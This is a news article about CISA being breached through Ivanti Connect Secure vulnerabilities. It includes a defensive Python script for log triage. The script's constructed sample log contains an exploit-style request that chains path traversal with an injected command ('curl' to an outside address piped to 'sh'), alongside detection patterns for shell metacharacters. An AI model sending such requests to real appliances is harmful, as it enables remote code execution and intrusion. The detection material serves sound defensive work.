The US Cybersecurity and Infrastructure Security Agency (CISA) was itself hit by a cyberattack that exploited vulnerabilities in Ivanti products, according to agency officials.
A CISA spokesperson told The Record that the breach occurred in February and affected two systems, which an anonymous source identified as the Infrastructure Protection (IP) Gateway and the Chemical Security Assessment Tool (CSAT).
IP Gateway is a web portal that supports the collection, analysis and distribution of sensitive information related to critical national infrastructure assets within the US.
CSAT is an online portal that hosts survey and application data submitted by chemical facilities deemed high-risk under the Chemical Facility Anti-Terrorism Standards (CFATS).
CSAT holds some of the country's most sensitive industrial information, including Site Security Plans (SSP), Security Vulnerability Assessments (SVA), and Top-Screen submissions, through which facilities report their holdings of chemicals of interest (COI).
The CISA spokesperson said the impact was limited to those two systems, which the agency took offline as soon as it became aware of the malicious activity, but declined to confirm or deny that they were IP Gateway and CSAT.
CISA warned organizations about the Ivanti risk, but failed to protect itself
In January 2024, Ivanti disclosed two vulnerabilities affecting all supported versions (9.x and 22.x) of its Connect Secure and Policy Secure products. Both flaws are in the web component of those products.
The first, CVE-2023-46805, is an authentication bypass that lets a remote attacker reach restricted resources by bypassing control checks; it was rated CVSS 8.2.
The second, CVE-2024-21887, is a command injection vulnerability that allows arbitrary commands to be executed on the appliance; it was rated CVSS 9.1. On its own it requires an authenticated administrator, which is why it matters that the first flaw removes that requirement: chained together, the two give an unauthenticated attacker remote command execution.
On January 31, CISA issued supplemental direction to its Emergency Directive 24-01 requiring agencies running the affected products to disconnect all Connect Secure and Policy Secure instances from their networks.
Agencies were also told to continue hunting for threats on any systems that were connected, or had recently been connected, to the affected appliances, to isolate those systems as much as possible, and to keep auditing privileged accounts.
On February 29, CISA published a joint advisory warning that threat actors were actively exploiting these flaws and that, in combination, they could be chained into sophisticated attacks.
“The vulnerabilities affect all supported versions and can be used in an exploit chain to allow malicious cyber threat actors to bypass authentication, create malicious requests, and execute arbitrary commands with elevated privileges.”
CISA encouraged organizations to assume that any user credentials and service accounts stored on the affected Ivanti VPN devices were likely compromised.
The agency also provided detection methods and indicators of compromise (IOC) to help organizations detect malicious activity on their networks.
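CISA's detection guidance is not reproduced on this page, so the following is an added example of the first-pass log triage a defender would run, not CISA's method and not drawn from its IOC list. It scans an appliance's web access logs for the two behaviours described above: path-traversal sequences that reach a restricted endpoint through the web component (the authentication-bypass pattern) and shell metacharacters in a request path (the command-injection pattern), and it flags any source that exhibits both, i.e. the chain. The log lines, endpoint names, addresses and payload are constructed for illustration and do not reproduce the real exploit URIs; URIs are decoded twice so double-encoded traversal sequences are not missed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache/nginx "combined" format) from a
# hypothetical VPN appliance. Endpoint names, IPs and payloads are invented for
# illustration; they are not the real exploit URIs or CISA's IOCs.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2024:10:01:02 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2024:10:01:09 +0000] "GET /api/v1/public/unauth-endpoint/../../admin/system-info HTTP/1.1" 200 311 "-" "curl/8.4.0"
203.0.113.7 - - [12/Jan/2024:10:01:15 +0000] "GET /api/v1/public/unauth-endpoint/../../admin/status/;curl%20http://203.0.113.9/a.sh%7Csh; HTTP/1.1" 200 15 "-" "curl/8.4.0"
198.51.100.22 - - [12/Jan/2024:10:02:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.22 - - [12/Jan/2024:10:02:30 +0000] "GET /api/v1/public/x/%2e%2e/%2e%2e/admin/status HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

# One line of "combined" log format: client IP, timestamp, request line, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shell metacharacters that have no business in a URI path segment.
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(|&&')


def decode_uri(uri: str) -> str:
    """URL-decode twice so double-encoded sequences (%252e -> %2e -> .) are caught."""
    return unquote(unquote(uri))


def classify(uri: str) -> list:
    """Return the rule names that fire for one request URI (path part only)."""
    path = decode_uri(uri).replace("\\", "/").split("?", 1)[0]
    hits = []
    # Traversal out of an unauthenticated API prefix into a restricted one:
    # the authentication-bypass pattern.
    if "/../" in path or path.endswith("/.."):
        hits.append("path_traversal")
    # Shell metacharacters in the path: the command-injection pattern.
    if SHELL_META_RE.search(path):
        hits.append("command_injection")
    return hits


def scan(log_text: str):
    """Scan access-log text; return (findings, sources that show the full chain)."""
    findings = []
    rules_by_source = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        status = int(m["status"])
        for rule in classify(m["uri"]):
            findings.append({
                "line": lineno,
                "src": m["ip"],
                "rule": rule,
                "uri": m["uri"],
                # A 2xx/3xx on a traversal or injection request means the
                # appliance served it: treat as likely compromise, not a probe.
                "served": status < 400,
            })
            rules_by_source.setdefault(m["ip"], set()).add(rule)
    chained = sorted(ip for ip, rules in rules_by_source.items()
                     if {"path_traversal", "command_injection"} <= rules)
    return findings, chained


if __name__ == "__main__":
    found, chain_sources = scan(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']}: {f['rule']:<18} src={f['src']} served={f['served']} uri={f['uri']}")
    print("sources exhibiting the bypass+injection chain:", chain_sources)
```

A served (2xx/3xx) response on a flagged request is the signal to escalate: the appliance answered the request, so CISA's assumption that credentials stored on the device are compromised applies. Run this over logs recovered from an image of the appliance rather than logs read through the appliance itself, since a compromised device cannot be trusted to report on its own state.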
Initial disclosure sparked a flurry of exploitation attempts
Threat-intelligence reporting shows the affected products have been under sustained attack over the past month.
An analysis by content-delivery and cloud company Akamai found that since the vulnerabilities were disclosed in January, Ivanti Connect Secure appliances have been targeted by more than 250,000 exploitation attempts per day.
Akamai said threat actors began trying to exploit the flaws in mid-January and recorded "widespread exploitation" of Connect Secure and Policy Secure products within 24 hours of disclosure.
Most of the attempts were probes, according to Akamai: the delivered payloads simply made beacon requests to attacker-controlled domains to confirm that a target was exploitable, groundwork for remote code execution (RCE) attacks as proof-of-concept (PoC) exploits matured.
Check Point published similar research describing a recent campaign by the Magnet Goblin threat actor that exploited the Ivanti Connect Secure VPN vulnerabilities.
The campaign reportedly began within a day of the patch being issued, aiming to exploit the flaws before organizations could update their systems.
Check Point's analysis indicated that Magnet Goblin used the vulnerability as an initial infection vector to deliver a new Linux variant of the Nerbian malware family, NerbianRAT, which the group is known to use in its attacks.